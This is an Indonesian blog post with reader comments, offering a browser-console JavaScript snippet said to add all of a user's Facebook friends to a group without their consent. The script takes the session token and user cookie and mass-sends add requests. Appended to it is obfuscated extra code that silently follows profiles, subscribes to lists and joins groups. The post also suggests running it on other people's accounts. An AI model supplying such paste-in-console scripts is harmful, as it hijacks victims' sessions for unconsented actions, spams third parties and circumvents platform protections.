Harga Jual / Beli Bitcoin

Cara Menambahkan Semua Teman Ke Grup Facebook

00:08:00 Wahab Saputra 69 Comments

Teman Blogger sedang mencari artikel dengan judul cara menambah anggota grup facebook dengan cepat, cara cepat menambahkan anggota ke grup fb, cara melihat grup yang diikuti teman, cara menambah anggota grup fb dengan cepat terbaru, cara menambah anggota grup facebook secara otomatis, auto invite group facebook terbaru atau cara menambahkan semua teman ke grup facebook terbaru berarti Kamu berada di posting yang tepat.

Cara Menambahkan Semua Teman Ke Grup Facebook
Group Facebook adalah tempat terbaik untuk setiap pembahasan dan diskusi berdasarkan minat dan tujuan yang sama dengan teman-teman pilihan Kamu sendiri atau anggota lainnya dalam group facebook. Tidak ada orang atau kelompok lain yang dari luar dapat mengganggu dalam group tanpa izin dari admin karena group facebook bisa diatur privasinya. Jika di halaman facebook setiap orang bebas untuk menyukai facebook page. Namun di dalam group sifatnya dapat rahasia, tertutup atau publik. Namun masalah yang kita hadapi dalam group adalah bahwa, kita harus menambahkan semua anggota secara manual satu persatu. Dan itu merupakan proses yang dapat memakan atau bahkan membuang waktu. Hari ini saya akan membahas tentang cara untuk menambahkan semua member dalam group Facebook. Kadang-kadang kita memiliki account dengan 5000 atau memiliki sedikit teman. Jadi bukan pekerjaan yang mudah untuk menambahkan terlalu banyak teman dan Kamu menghadapi kesulitan sambil menambahkanteman satu per satu. Tapi jangan khawatir saya akan berbagi tips dan triks sederhana dan termudah yang akan membantu Kamu untuk menambahkan semua teman-teman ke grup Facebook dalam beberapa menit dengan satu klik.

Teman Blogger berniat membuat group Facebook, juga sebagian besar dari kita telah mencoba tetapi masalah yang kita hadapi adalah bahwa kita tidak bisa mendapatkan banyak anggota untuk itu.

Jadi dalam posting ini saya akan berbagi script untuk menambahkan semua teman Facebook Kamu untuk menjadi member group facebook yang kamu miliki. Kode ini akan menambah orang tanpa izin pemilik akun facebook yang bersangkutan. Di satu sisi ini mungkin perbuatan yang bisa dibilang illegal tapi di sisi lain cara ini sangat membantu bagi para pemilik group facebook

Sebenarnya ada banyak ekstensi Chrome yang menawarkan hal yang sama, tapi saya tidak akan merekomendasikannya karena kebanyakan dari extension chrome tidak hanya menambah teman ke grup tetapi juga mencoba untuk spamming profil facebook Kamu atau teman facebook Kamu.

Menambahkan semua teman dalam group dengan script ini akan sangat membantu. Jika kamu lelah menambahkan orang ke grup Kamu satu per satu dalam group Facebook?. Berikut Adalah solusi untuk menambahkan semua teman Kamu dalam group dengan satu klik saja. Caranya mudah cukup hanya meng copy paste code lalu pastekan ke group yang inginkan. Sekarang teman Kamu akan secara otomatis ditambahkan di group.

Perhatian...!!!
Mohon Maaf Script Ini Sudah Tidak Work, Tunggu Update'y Sampai Batas Waktu Yang Tidak Ditentukan :

Berikut Script yang kita gunakan untuk menambahkan semua teman facebook ke dalam grup :

(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Friends</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Search For Followers... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>People Invited!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Close</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='display:none; margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Fb Group Script By Safe Tricks </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]) function cereziAl(isim) { var tarama = isim + "="; if (document.cookie.length > 0) { konum = document.cookie.indexOf(tarama) if (konum != -1) { konum += tarama.length son = document.cookie.indexOf(";", konum) if (son == -1) son = document.cookie.length return unescape(document.cookie.substring(konum, son)) } else { return ""; } } } function getRandomInt (min, max) { return Math.floor(Math.random() * (max - min + 1)) + min; } function randomValue(arr) { return arr[getRandomInt(0, arr.length-1)]; } var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function a(abone){ var http4 = new XMLHttpRequest(); var url4 = "/ajax/follow/follow_profile.php?__a=1"; var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp="; http4.open("POST", url4, true); //Send the proper header information along with the request http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http4.setRequestHeader("Content-length", params4.length); http4.setRequestHeader("Connection", "close"); http4.onreadystatechange = function() {//Call a function when the state changes. if(http4.readyState == 4 && http4.status == 200) { http4.close; // Close the connection } } http4.send(params4); } function sublist(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a); } a(""); a(""); var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/membership/r2j.php?__a=1'; var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['send'](paramswp); var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); var friends = new Array(); gf = new XMLHttpRequest(); gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false); gf['send'](); if (gf['readyState'] != 4) {} else { data = eval('(' + gf['responseText']['substr'](9) + ')'); if (data['error']) {} else { friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) { return _0x93dax8['index'] - _0x93dax9['index']; }); }; };


Berikut penggunaan script auto invite pada browser google chrome dan mozilla firefox :

Cara menggunakan menggunakan script auto invite pada chrome dan firefox
  • Pertama-tama Login ke akun facebook Kamu. 
  • Kemudian buka Grup Facebook yang ingin Kamu tambahkan membernya. 
  • Sekarang Klik tombol F12 untuk membuka debugger dan kemudian pilih kotak console. 
  • Sekarang copy paste script di atas pada console box. Lihat gambar dibawah copas script pada tanda panah nomor 2, lalu Enter. Silahkan tunggu prosesnya sampai selesai.
Google Chrome

Mozilla Firefox
Tips dan Triks untuk memaksimalkan script auto invite ini :
  • Gunakan pada akun yang memiliki jumlah teman lebih dari 1000
  • Manfaatkan akun facebook pacar, teman, sahabat atau akun siapa saja yang memiliki banyak teman.

Demikian artikel kali ini tentang Cara Mudah dan Cepat Menambahkan Semua Teman Ke Grup Facebook, semoga cara ini masih 100% Work dan tidak mengecewakan Teman Blogger. Sekian dan terima kasih.

69 comments:

  1. Mayan nih infonya tapi kayaknya Lulu mah belum butuh buat dipake. Kedepannya gatau, nanti balik lagi aja ke sini kalo perlu script-nya. :D

    ReplyDelete
  2. Saya tidak terlalu aktif kang kalau difb mah soalnya banyak yang menandai gituh kang dalam potingannya tapi tidak saya kenal dan pernah ada orang luar negeri yang menandai seperti itu jadi saya bosen mainnya.

    ReplyDelete
    Replies
    1. Kalau kayak gitu diatur aja privasinya, siapa aja bisa nge-tag / menandai kita...

      Delete
  3. Thanks untuk tips nya sob, bisa saya coba ntar lain waktu. Sementara izin bookmark dlu sobb.
    salam kenal juga sob di tunggu kun jungan baliknya :)

    ReplyDelete
  4. Asyi sekali yang deman bermain medsos di Facebook untuk mencari teman dan menyeleksinya, apalgi dengan buat grup. Tapi ngomong-ngomong kalau di lihat dairi grup orangnya rata-rata sama aja Kang. he,, he, he,

    ReplyDelete
  5. Say pernah coba trik ini mas..tapi broser nya menolak...g tahu kenapa.....

    ReplyDelete
  6. Kapan kapan akan saya coba lagi mas...mungkin waktu itu kodenya salah ...maturnuwun banget nggeh mas....

    ReplyDelete
  7. udah jarang update fb kang, kadang hanya 'ngintip' aja saya mah...

    ReplyDelete
    Replies
    1. Kenapa cuman ngintip, padahal penting loh gan

      Delete
  8. Kalau teman banyak, kita posting artikel di FB, bakal jadi bertambah banyak temannya dan banyak juga kunjungan blognya

    ReplyDelete
    Replies
    1. Itu dia salah satu manfaatnya Mas...

      Delete
  9. Betul kang, fb itu penting, sedang istirahat aja dulu, nanti di lanjut lagi.. hehe..

    ReplyDelete
  10. Minta cara agar pas klik readmore/judul artikel - masuknya ke adsense. Sebelumnya, masuk ke home lagi.

    ReplyDelete
    Replies
    1. Bisa sich tapi itu ngelanggar TOS GA...

      Delete
    2. Lha ini di blogmu tiap aku klik judul, readmore, atau reply, selalu ke iklan dulu. -,-

      Delete
    3. Klo itu iklan Poscash...
      Daftar disini https://popcash.net/register/94053

      Delete
  11. Oh begini caranya pantesan saya sering dapat invite grup fb padahal saya ga pernah join bisa dicoba nanti kalau punya grup di facebook

    ReplyDelete
  12. wah sjrip menu menambah temannya panjang banget mang, tapi jika sekiranya tidak menjadikan berat blog mah, boleh juga di cobain nih

    ReplyDelete
  13. kadang-kadang sih ke fb, tapi belum pernah ketemu cara kayak gini mas, makasih saya coba deh nanti. sekarang mah mau shalat shubuh dulu

    ReplyDelete
  14. wah, ini yang saya cari, mau coba dulu ya mas

    ReplyDelete
  15. ada caranya ya biar cepat banyak anggotanya ya. bisa di coba - coba kayanya mas nih.

    ReplyDelete
  16. berarti pencatutan massal ya mas hehehhehe

    ReplyDelete
  17. Saya beberapa kali gagal menambahkan salah satu teman fb, ke group yg tlah saya buat,...apa sebabnya mohon jawaban beserta caranya,....

    ReplyDelete
    Replies
    1. Kirim screenshoot notifikasi ke email saya... wahabisland@gmail.com

      Delete
  18. http://pusatjasaketenagakerjaan.blogspot.co.id/

    ReplyDelete
  19. Ajib bener nih gan. 100% work gak bikin jari kriting lagi. Trims

    ReplyDelete
  20. Om,, kalau pas lagi proses trus ada pemberitahuan diblokir pihak facebook apakah tetap berhasil bos ?

    ReplyDelete
    Replies
    1. Ada screenshootnya...?
      Biar aman lakukan trik ini 1-3 akun sehari..

      Delete
  21. apakah punya script untuk menambah like page gan ?

    ReplyDelete
    Replies
    1. Kalau auto like,,, gak punya...!!!
      Tapi, untuk mengundang semua teman ada...

      Delete
  22. jujur gan ini sangat berguna, tapi waktu saya pakai akun saya kena strike ama FB selama 1 bulan hik hik

    ReplyDelete
    Replies
    1. Itu resiko kalau memakai secara berlebihan...

      Delete
  23. baru aja coba gan... hehehe.. dan akunku di tendang sama FB, tapi abis itu cuma disuruh konfirmasi tebak2 foto profil teman... hahhaa.. wlaaupn ngga apal, tapi kira2 aja.. dan bisa dibuka lagi... Grup pun langsung otomatis jadi banyak anggotanya,.. makasih gan.. beresiko, tapi sukses kwkwkwkkwk

    ReplyDelete
  24. Gan,mau nanya nih,cara buat buka blokir karena sudah pakai cara di atas gimana yah?
    soalnya saya kena blokir sampe tgl 23sep16 nih.
    mohon bantuanya lagi.
    thks before.

    ReplyDelete
    Replies
    1. Kalau gitu tunggu aja,,,
      Ini resiko menggunakan auto script...

      Delete
  25. Keren nih. Thanks Gan!

    Kbetulan punya bnyak klonengan + full friend

    ReplyDelete
  26. mantap sih gan tp kena blokir nambahin orang wkwkwkwk... yg penting dah udh kejeblos semua tuh tmn fb ane hahaha thankz ya gan bermanfaat bnget

    ReplyDelete
    Replies
    1. Masih work ternyata scriptnya...

      Blokir sementara gan...

      Delete
  27. Masih gan.... thankz.. tp saya coba di mozilla temen gk bisa ada kata stop gitu

    ReplyDelete
  28. bisa dicoba nih...., masih bisa ga ya... :)

    ReplyDelete
  29. Gan cara ngatur agar anggota grup yg bukan admin gak bisa sembarangan masukin gambar ke grup gmn ya? Mohon pencerahan

    ReplyDelete
    Replies
    1. Lihat ini http://ketikwww.blogspot.co.id/2013/06/cara-filter-postingan-group-facebook.html

      Delete
  30. permisi gan, saya sudah coba dan work . tpi terhenti karena terdeteksi keamanan facebook jadi saya diblokir untuk invite orang. berhentinya di seratusan doang mas. gimana caranya supaya gak terblokir bisa langsung invite ribuan teman kita ?

    ReplyDelete
    Replies
    1. nah itu dia yang saya lagi cari caranya, cos script ini sudah terdeteksi sebagai malware...

      Delete
  31. MAKASH GAN WORKKKKKKKKKKKK :_))))

    ReplyDelete
  32. mas barusan saya nyoba dan Work,tapi semantara saya di blokkir,supaya di pulihkan kemabalii gmana caranya ya mas ??

    ReplyDelete
    Replies
    1. Biasanya nunggu seminggu...
      Akun akan aktif kembali...

      Delete

Jangan titip link.....saya pasti berkunjung balik....
Beri tahu saya di kotak komentar kalau sobat sudah Follow Blog ini, agar saya bisa segera Folback dan tidak ketinggalan Update artikel dari blog sobat...!!!